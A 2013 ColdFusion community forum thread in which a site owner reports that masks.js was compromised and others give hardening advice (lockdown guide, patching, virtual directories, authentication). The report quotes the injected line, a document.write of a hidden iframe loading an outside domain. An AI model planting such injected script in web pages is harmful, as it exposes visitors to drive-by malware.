cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Exit
search
  • Global community
    • Language:
      • Deutsch
      • English
      • Español
      • Français
      • Português
  • 日本語コミュニティ
  • 한국 커뮤니티
0
Upvote

CFIDE/scripts/masks.js Compromised

XeeMe2
New Here ,
Sep 03, 2013 Sep 03, 2013

We just found an injection at the end of masks.js

Here is the content that was added:

"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"

Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?

It must have happened August 31, 2013

We are using CF 9.02 with ....lib/updates/hf902-00003.jar

Thanks for any feedback and advice how to prevent another one

Rob

2.3K
Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
replies 8 Replies 8
latest latest Jump to latest reply
Anit_Kumar Adobe Employee
Adobe Employee ,
Sep 03, 2013 Sep 03, 2013

Hello XeeMe2,

Thank you for your post. have you followed the LockDown guide for blocking CFIDE requests. Here is the link http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-...

Regards,

Anit Kumar

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Steve Sommers
Advocate ,
Sep 03, 2013 Sep 03, 2013

There are various threads on this and similar CFIDE vulnerabilities. Make sure you are at the latest patch/hotfix level. Also for your web facing sites, I always recommend pointing your "cfide" virtual directory to an empty directory and then adding a "scripts" virtual directory under it that points back to the original cfide/scripts location. This fixes most CFIDE vulnerabilities.

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
XeeMe2
New Here ,
Sep 03, 2013 Sep 03, 2013

Thanks Anit, appreciate it. Yes, we saw it but felt it is not really helping as the CFIDE will need to be accessible virtually somehow. Also it looked like a huge act for just a little improvement.

Steve, thanks a lot for your comment. Do you have a more detailed description somewhere? Not sure how to do what you suggested.

Thanks

Rob

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
tribule
Enthusiast ,
Sep 03, 2013 Sep 03, 2013

Would making all of the /CFIDE folder have basic authentication, for example, stop such an attack?

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Anit_Kumar Adobe Employee
Adobe Employee ,
Sep 03, 2013 Sep 03, 2013
In Response To tribule

Please refer to the Block /CFIDE requests section of the LockDown Guide (http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-...).

And refer to Set up a virtual directory alias for /CFIDE/scripts for CFIDE/Scripts on the same guide.

Hope this answers your query.

Regards,

Anit Kumar

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
tribule
Enthusiast ,
Sep 04, 2013 Sep 04, 2013
In Response To Anit_Kumar

Anit, I've read the lockdown guide, but can you also please confirm that putting authentication on the CFIDE folder will also stop such attacks. Or, is this not a good idea? If not, why?

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Steve Sommers
Advocate ,
Sep 04, 2013 Sep 04, 2013
In Response To tribule

It might fix your immediate problem but you will still need to allow anonymous access to the /cfide/scripts directory. To me this route would just open up another attack vector for a would be evil doer. Now they could start directly attacking your OS users via accessing the cfide directory.

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
tribule
Enthusiast ,
Sep 05, 2013 Sep 05, 2013
LATEST
In Response To Steve Sommers

Steve, thanks for the reply. Can anonymous access rights still be granted to CFIDE but with authentication enabled? Does putting authentication on CFIDE cause any problems?

Translate
Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Resources
Documentation
ColdFusion User Guide
Open in a new window
Copyright © 2025 Adobe. All rights reserved.
Using the Community Experience League Terms of Use Privacy Cookie preferences Do not sell or share my personal information ad choicesAdChoices